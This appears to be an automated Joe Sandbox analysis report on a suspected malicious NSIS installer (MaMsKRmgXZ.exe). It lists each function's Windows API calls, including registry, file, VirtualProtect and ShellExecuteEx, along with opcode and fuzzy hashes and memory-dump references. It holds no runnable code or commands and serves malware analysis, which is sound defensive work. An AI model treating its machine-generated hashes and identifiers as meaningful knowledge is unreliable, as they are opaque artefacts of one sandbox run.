Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004026EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D

Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E

Uniqueness

Uniqueness Score: -1.00%

Function 00402363 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
Instruction ID: fe35eca7c2654f279d717fea31bdeaa6937bb5491eee9e26a1e5aab6719f7fed
Opcode Fuzzy Hash: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
Instruction Fuzzy Hash: B2E04F31A003256BDB213EB25E8ED6F3669AB84744B16113BFA01BA2C2D9BC1C05C26D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8E Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 00405EB7

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,004031B8,00000000,004128C0,00000020,004128C0,00000020,000000FF,00000004,00000000), ref: 00405C2E

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405BEB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031EA,00000000,00000000,00403047,000000FF,00000004,00000000,00000000,00000000), ref: 00405BFF

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9

Uniqueness

Uniqueness Score: -1.00%

Function 6EC02921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6EC0404C,00000004,00000040,6EC0403C), ref: 6EC0293F

Memory Dump Source

Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true

Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0986e17c87bc44b4f25ca2eb3bfc7259fe60b90aff143c5d58f633fe3516bc9d
Instruction ID: a553d1ace0577ecb1e7a78a0253b00256a4d411b7628d93c92d1ed9b19ace293
Opcode Fuzzy Hash: 0986e17c87bc44b4f25ca2eb3bfc7259fe60b90aff143c5d58f633fe3516bc9d
Instruction Fuzzy Hash: 3FF092B1509A80DEDB60DFA886847073FF5B3AA35DB03852EE178F7241E3364A468B11

Uniqueness

Uniqueness Score: -1.00%

Function 004023A7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
Instruction ID: 87433fbf28b19ed2e9e97c64dce3a42f5842ec6a66e9b0e36d30645c49e8dc10
Opcode Fuzzy Hash: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
Instruction Fuzzy Hash: 92E01230904309BAEB02AFB08D09EBE3E79EF05710F10042AB9606A0D2E6B89542D75E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E60 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EEE,?,?,?,?,00000002,Call), ref: 00405E84

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
Opcode Fuzzy Hash: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A

Uniqueness

Uniqueness Score: -1.00%

Function 004040B4 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103F8,00000000,00000000,00000000), ref: 004040C6

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D

Uniqueness

Uniqueness Score: -1.00%

Function 004031ED Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040409D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403ECD), ref: 004040AB

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004056BC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,004044AF,?), ref: 004056CB

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A

Uniqueness

Uniqueness Score: -1.00%

Function 0040408A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0040599D Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,00403342,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000020,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000000,?,00000006,00000008,0000000A), ref: 004059AA

Memory Dump Source

Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 8cf835664248effb320104481b144b4bb8d71e10ab3bb1acd277cfd9e7e0a14f
Instruction ID: b74f3e51ff379b0403c46f5e122a68af47440e22da2293db9c2025f450519604
Opcode Fuzzy Hash: 8cf835664248effb320104481b144b4bb8d71e10ab3bb1acd277cfd9e7e0a14f
Instruction Fuzzy Hash: 21C0807080D540E7F6114730952456B7FE09A51350F54C857F4C063251C138B8408F37

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004044FA Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404549
SetWindowTextA.USER32(00000000,?), ref: 00404573
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
CoTaskMemFree.OLE32(00000000), ref: 0040462F
lstrcmpiA.KERNEL32(Call,Nagari Setup: Installing), ref: 00404661
lstrcatA.KERNEL32(?,Call), ref: 0040466D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040467F

Part of subcall function 004056DA: GetDlgItemTextA.USER32(?,?,00000400,004046B6), ref: 004056ED

Part of subcall function 00406244: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040629C
Part of subcall function 00406244: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062A9
